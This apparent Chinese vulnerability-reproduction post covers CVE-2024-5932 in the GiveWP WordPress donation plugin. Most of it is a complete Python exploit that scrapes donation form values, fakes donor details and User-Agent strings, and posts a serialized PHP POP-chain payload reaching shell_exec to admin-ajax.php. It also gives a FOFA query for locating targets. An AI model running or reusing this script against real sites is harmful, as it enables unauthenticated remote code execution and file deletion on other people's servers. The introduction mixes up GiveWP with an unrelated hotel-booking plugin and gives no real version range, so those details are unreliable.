WordPress GiveWP存在反序列漏洞(CVE-2024-5932)
佳会一、漏洞简介
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress Plugin WP Hotel Booking 是一款完整的酒店预订插件。WordPress GiveWP存在反序列漏洞(CVE-2024-5932)
二、影响版本
- WordPress
三、资产测绘
- fofa
<font style="color:rgb(199, 37, 78);">body="wp-content/plugins/wp-hotel-booking"</font>
- 特征
四、漏洞复现
import requests
from bs4 import BeautifulSoup
from faker import Faker
from urllib.parse import urlparse
import random
import hashlib
import time
import sys
import re
import rich_click as click
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
banner = r"""
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================
CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion
=============================================================================================================
"""
class GiveWPExploit:
def __init__(self, url: str, file: str):
self.url = url
self.file = file
def greeting() -> None:
print(banner)
def spinner(duration=10, interval=0.1) -> None:
spinner_chars = ['|', '/', '-', '\\']
end_time = time.time() + duration
while time.time() < end_time:
for char in spinner_chars:
sys.stdout.write(f'\r[{char}] Exploit loading, please wait...')
sys.stdout.flush()
time.sleep(interval)
print("")
def getBaseUrl(self, url):
parsed_url = urlparse(url)
base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
return base_url
def getParams(self) -> dict:
response = requests.get(self.url)
soup = BeautifulSoup(response.text, 'html.parser')
give_form_id = soup.find('input', {'name': 'give-form-id'})['value']
give_form_hash = soup.find('input', {'name': 'give-form-hash'})['value']
button_tag = soup.find('button', {'data-price-id': True})
give_price_id = button_tag['data-price-id']
give_amount = button_tag.get_text(strip=True)
# Fake Userinfo
fake = Faker()
params = {"give-form-id" : give_form_id,
"give-form-hash" : give_form_hash,
"give-price-id" : give_price_id,
"give-amount" : give_amount,
"give_first": fake.first_name(),
"give_last": fake.last_name(),
"give_email": fake.email(),}
return params
def getData(self) -> dict:
file = self.file
rand_md5 = hashlib.md5(str(random.randint(0, 10)).encode()).hexdigest()
# Payload
payload = 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}' % (len(file), file)
data = self.getParams()
data['give_title'] = payload
data['give-gateway'] = 'offline'
data['action'] = 'give_process_donation'
print(f"[+] Requested Data: ")
print(data)
return data
def isEmbed(self, url: str) -> str:
pattern = r'<iframe[\s\S]*?\bname="give-embed-form"[\s\S]*?>'
response = requests.get(url)
match = re.search(pattern, response.text)
if match:
soup1 = BeautifulSoup(response.text, 'html.parser')
embed_url = soup1.find('iframe')['src']
return embed_url
else:
return url
def sendRequest(self) -> None:
# Fake User_Agent
fake = Faker()
baseUrl = self.getBaseUrl(self.url)
reqUrl = f"{baseUrl}/wp-admin/admin-ajax.php"
data = self.getData()
headers = {
'User-Agent': fake.user_agent(),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding': 'gzip, deflate, br'
}
response = requests.post(reqUrl, data=data, headers=headers)
def exploit(self) -> None:
self.url = self.isEmbed(self.url)
self.sendRequest()
# argument parsing with rich_click
@click.command()
@click.option(
"-u",
"--url",
required=True,
help="Specify a URL or domain for vulnerability detection (Donation-Form Page)",
)
@click.option(
"-c",
"--cmd",
default="/tmp/test",
help="Specify the file to read from the server",
)
def main(url: str, cmd: str) -> None:
cve_exploit = GiveWPExploit(url, cmd)
GiveWPExploit.greeting()
GiveWPExploit.spinner(duration=1)
cve_exploit.exploit()
if __name__ == "__main__":
main()